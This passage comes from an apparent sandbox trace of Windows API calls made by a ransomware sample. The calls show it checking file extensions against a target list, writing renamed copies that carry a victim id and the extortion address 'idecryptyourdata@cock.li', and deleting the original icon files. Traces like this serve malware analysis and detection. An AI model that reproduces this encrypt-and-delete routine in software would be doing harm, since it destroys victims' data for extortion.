-1 [0047.378] lstrlenW (lpString=".pdf") returned 4 [0047.378] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.378] lstrlenW (lpString=".xls") returned 4 [0047.378] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.378] lstrlenW (lpString=".xlsx") returned 5 [0047.378] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0047.378] lstrlenW (lpString=".ppt") returned 4 [0047.378] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.378] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0047.378] lstrlenW (lpString=".zip") returned 4 [0047.378] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.378] lstrlenW (lpString=".rar") returned 4 [0047.378] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.378] lstrlenW (lpString=".bz2") returned 4 [0047.378] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.378] lstrlenW (lpString=".7z") returned 3 [0047.379] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.379] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0047.379] lstrlenW (lpString=".dbf") returned 4 [0047.379] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.379] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0047.379] lstrlenW (lpString=".1cd") returned 4 [0047.379] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.379] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0047.379] lstrlenW (lpString=".jpg") returned 4 [0047.379] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.379] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0047.379] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0047.379] lstrlenW (lpString=".doc") returned 4 [0047.379] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.379] lstrlenW (lpString=".docx") returned 5 [0047.379] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0047.379] lstrlenW (lpString=".pdf") returned 4 [0047.379] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.379] lstrlenW (lpString=".xls") returned 4 [0047.379] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.379] lstrlenW (lpString=".xlsx") returned 5 [0047.379] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0047.379] lstrlenW (lpString=".ppt") returned 4 [0047.379] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.379] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0047.379] lstrlenW (lpString=".zip") returned 4 [0047.379] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.379] lstrlenW (lpString=".rar") returned 4 [0047.379] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.379] lstrlenW (lpString=".bz2") returned 4 [0047.379] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.379] lstrlenW (lpString=".7z") returned 3 [0047.379] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.379] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0047.379] lstrlenW (lpString=".dbf") returned 4 [0047.379] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.379] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0047.380] lstrlenW (lpString=".1cd") returned 4 [0047.380] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.380] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0047.380] lstrlenW (lpString=".jpg") returned 4 [0047.380] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.380] lstrcmpiW (lpString1=".ico", lpString2=".bat") returned 1 [0047.380] lstrlenW (lpString="DisplayIcon.ico") returned 15 [0047.380] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0047.380] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=88533) returned 1 [0047.380] CloseHandle (hObject=0x2cc) returned 1 [0047.380] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico")) returned 0x80 [0047.380] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.380] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0047.380] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.380] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.381] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0047.381] GetLastError () returned 0x0 [0047.381] ReadFile (in: hFile=0x2cc, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x159d5, lpOverlapped=0x0) returned 1 [0047.383] WriteFile (in: hFile=0x2d0, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x159e0, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x159e0, lpOverlapped=0x0) returned 1 [0047.385] ReadFile (in: hFile=0x2cc, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0047.385] WriteFile (in: hFile=0x2d0, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0xf2, lpOverlapped=0x0) returned 1 [0047.385] SetEndOfFile (hFile=0x2d0) returned 1 [0047.386] CloseHandle (hObject=0x2d0) returned 1 [0047.388] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.388] SetEndOfFile (hFile=0x2cc) returned 1 [0047.389] CloseHandle (hObject=0x2cc) returned 1 [0047.389] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.389] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\DisplayIcon.ico" (normalized: "c:\\588bce7c90097ed212\\displayicon.ico")) returned 1 [0047.390] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0047.390] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0047.390] lstrlenW (lpString=".doc") returned 4 [0047.390] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0047.390] lstrlenW (lpString=".docx") returned 5 [0047.390] lstrcmpiW (lpString1=".docx", lpString2="n.ico") returned -1 [0047.390] lstrlenW (lpString=".pdf") returned 4 [0047.390] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0047.390] lstrlenW (lpString=".xls") returned 4 [0047.390] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0047.390] lstrlenW (lpString=".xlsx") returned 5 [0047.390] lstrcmpiW (lpString1=".xlsx", lpString2="n.ico") returned -1 [0047.390] lstrlenW (lpString=".ppt") returned 4 [0047.390] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0047.390] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0047.390] lstrlenW (lpString=".zip") returned 4 [0047.390] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0047.390] lstrlenW (lpString=".rar") returned 4 [0047.390] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0047.390] lstrlenW (lpString=".bz2") returned 4 [0047.390] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0047.390] lstrlenW (lpString=".7z") returned 3 [0047.390] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0047.390] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0047.390] lstrlenW (lpString=".dbf") returned 4 [0047.390] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0047.390] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0047.390] lstrlenW (lpString=".1cd") returned 4 [0047.390] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0047.390] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0047.390] lstrlenW (lpString=".jpg") returned 4 [0047.390] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0047.391] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0047.391] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0047.391] lstrlenW (lpString=".doc") returned 4 [0047.391] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0047.391] lstrlenW (lpString=".docx") returned 5 [0047.391] lstrcmpiW (lpString1=".docx", lpString2="n.ico") returned -1 [0047.391] lstrlenW (lpString=".pdf") returned 4 [0047.391] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0047.391] lstrlenW (lpString=".xls") returned 4 [0047.391] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0047.391] lstrlenW (lpString=".xlsx") returned 5 [0047.391] lstrcmpiW (lpString1=".xlsx", lpString2="n.ico") returned -1 [0047.391] lstrlenW (lpString=".ppt") returned 4 [0047.391] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0047.391] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0047.391] lstrlenW (lpString=".zip") returned 4 [0047.391] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0047.391] lstrlenW (lpString=".rar") returned 4 [0047.391] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0047.391] lstrlenW (lpString=".bz2") returned 4 [0047.391] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0047.391] lstrlenW (lpString=".7z") returned 3 [0047.391] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0047.391] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0047.391] lstrlenW (lpString=".dbf") returned 4 [0047.391] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0047.391] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0047.391] lstrlenW (lpString=".1cd") returned 4 [0047.391] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0047.391] lstrlenW (lpString="C:\\588bce7c90097ed212\\DisplayIcon.ico") returned 37 [0047.391] lstrlenW (lpString=".jpg") returned 4 [0047.391] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0047.391] lstrcmpiW (lpString1=".ico", lpString2=".bat") returned 1 [0047.391] lstrlenW (lpString="Print.ico") returned 9 [0047.392] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0047.558] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=1150) returned 1 [0047.558] CloseHandle (hObject=0x2e0) returned 1 [0047.558] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico")) returned 0x80 [0047.558] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.558] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0047.558] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.558] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.558] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0047.559] GetLastError () returned 0x0 [0047.559] ReadFile (in: hFile=0x2e0, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x47e, lpOverlapped=0x0) returned 1 [0047.560] WriteFile (in: hFile=0x2c0, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x480, lpOverlapped=0x0) returned 1 [0047.561] ReadFile (in: hFile=0x2e0, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0047.561] WriteFile (in: hFile=0x2c0, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0xe6, lpOverlapped=0x0) returned 1 [0047.561] SetEndOfFile (hFile=0x2c0) returned 1 [0047.561] CloseHandle (hObject=0x2c0) returned 1 [0047.562] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.562] SetEndOfFile (hFile=0x2e0) returned 1 [0047.563] CloseHandle (hObject=0x2e0) returned 1 [0047.563] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.563] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico")) returned 1 [0047.564] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0047.564] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0047.564] lstrlenW (lpString=".doc") returned 4 [0047.564] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0047.564] lstrlenW (lpString=".docx") returned 5 [0047.564] lstrcmpiW (lpString1=".docx", lpString2="t.ico") returned -1 [0047.564] lstrlenW (lpString=".pdf") returned 4 [0047.564] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0047.564] lstrlenW (lpString=".xls") returned 4 [0047.564] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0047.564] lstrlenW (lpString=".xlsx") returned 5 [0047.564] lstrcmpiW (lpString1=".xlsx", lpString2="t.ico") returned -1 [0047.564] lstrlenW (lpString=".ppt") returned 4 [0047.564] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0047.564] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0047.564] lstrlenW (lpString=".zip") returned 4 [0047.564] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0047.564] lstrlenW (lpString=".rar") returned 4 [0047.564] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0047.564] lstrlenW (lpString=".bz2") returned 4 [0047.564] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0047.564] lstrlenW (lpString=".7z") returned 3 [0047.564] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0047.564] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0047.565] lstrlenW (lpString=".dbf") returned 4 [0047.565] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0047.565] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0047.565] lstrlenW (lpString=".1cd") returned 4 [0047.565] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0047.565] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0047.565] lstrlenW (lpString=".jpg") returned 4 [0047.565] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0047.565] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0047.565] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0047.565] lstrlenW (lpString=".doc") returned 4 [0047.565] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0047.565] lstrlenW (lpString=".docx") returned 5 [0047.565] lstrcmpiW (lpString1=".docx", lpString2="t.ico") returned -1 [0047.565] lstrlenW (lpString=".pdf") returned 4 [0047.565] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0047.565] lstrlenW (lpString=".xls") returned 4 [0047.565] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0047.565] lstrlenW (lpString=".xlsx") returned 5 [0047.565] lstrcmpiW (lpString1=".xlsx", lpString2="t.ico") returned -1 [0047.565] lstrlenW (lpString=".ppt") returned 4 [0047.565] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0047.565] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0047.566] lstrlenW (lpString=".zip") returned 4 [0047.566] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0047.566] lstrlenW (lpString=".rar") returned 4 [0047.566] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0047.566] lstrlenW (lpString=".bz2") returned 4 [0047.566] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0047.566] lstrlenW (lpString=".7z") returned 3 [0047.566] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0047.566] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0047.566] lstrlenW (lpString=".dbf") returned 4 [0047.566] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0047.566] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0047.566] lstrlenW (lpString=".1cd") returned 4 [0047.566] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0047.566] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 40 [0047.566] lstrlenW (lpString=".jpg") returned 4 [0047.566] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0047.566] lstrcmpiW (lpString1=".ico", lpString2=".bat") returned 1 [0047.566] lstrlenW (lpString="Rotate4.ico") returned 11 [0047.567] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0047.592] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x30cff14 | out: lpFileSize=0x30cff14*=894) returned 1 [0047.592] CloseHandle (hObject=0x2e0) returned 1 [0047.593] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico")) returned 0x80 [0047.593] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.593] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0047.593] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.593] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.593] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0047.593] GetLastError () returned 0x0 [0047.593] ReadFile (in: hFile=0x2e0, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x37e, lpOverlapped=0x0) returned 1 [0047.595] WriteFile (in: hFile=0x2c0, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0x380, lpOverlapped=0x0) returned 1 [0047.596] ReadFile (in: hFile=0x2e0, lpBuffer=0x3e08020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x30cfecc, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesRead=0x30cfecc*=0x0, lpOverlapped=0x0) returned 1 [0047.596] WriteFile (in: hFile=0x2c0, lpBuffer=0x3e08020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x30cfc94, lpOverlapped=0x0 | out: lpBuffer=0x3e08020*, lpNumberOfBytesWritten=0x30cfc94*=0xea, lpOverlapped=0x0) returned 1 [0047.596] SetEndOfFile (hFile=0x2c0) returned 1 [0047.596] CloseHandle (hObject=0x2c0) returned 1 [0047.597] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30cfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.597] SetEndOfFile (hFile=0x2e0) returned 1 [0047.598] CloseHandle (hObject=0x2e0) returned 1 [0047.598] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.598] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate4.ico")) returned 1 [0047.598] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0047.599] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0047.599] lstrlenW (lpString=".doc") returned 4 [0047.599] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0047.599] lstrlenW (lpString=".docx") returned 5 [0047.599] lstrcmpiW (lpString1=".docx", lpString2="4.ico") returned -1 [0047.599] lstrlenW (lpString=".pdf") returned 4 [0047.599] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0047.599] lstrlenW (lpString=".xls") returned 4 [0047.599] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0047.599] lstrlenW (lpString=".xlsx") returned 5 [0047.599] lstrcmpiW (lpString1=".xlsx", lpString2="4.ico") returned -1 [0047.599] lstrlenW (lpString=".ppt") returned 4 [0047.599] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0047.599] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0047.599] lstrlenW (lpString=".zip") returned 4 [0047.599] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0047.599] lstrlenW (lpString=".rar") returned 4 [0047.599] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0047.599] lstrlenW (lpString=".bz2") returned 4 [0047.599] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0047.599] lstrlenW (lpString=".7z") returned 3 [0047.599] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0047.599] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0047.599] lstrlenW (lpString=".dbf") returned 4 [0047.599] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0047.599] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0047.599] lstrlenW (lpString=".1cd") returned 4 [0047.599] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0047.600] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0047.600] lstrlenW (lpString=".jpg") returned 4 [0047.600] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0047.600] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0047.600] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0047.600] lstrlenW (lpString=".doc") returned 4 [0047.600] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0047.600] lstrlenW (lpString=".docx") returned 5 [0047.600] lstrcmpiW (lpString1=".docx", lpString2="4.ico") returned -1 [0047.600] lstrlenW (lpString=".pdf") returned 4 [0047.600] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0047.600] lstrlenW (lpString=".xls") returned 4 [0047.600] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0047.600] lstrlenW (lpString=".xlsx") returned 5 [0047.600] lstrcmpiW (lpString1=".xlsx", lpString2="4.ico") returned -1 [0047.600] lstrlenW (lpString=".ppt") returned 4 [0047.600] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0047.600] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned 42 [0047.600] lstrlenW (lpString=".zip") returned 4 [0047.600] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 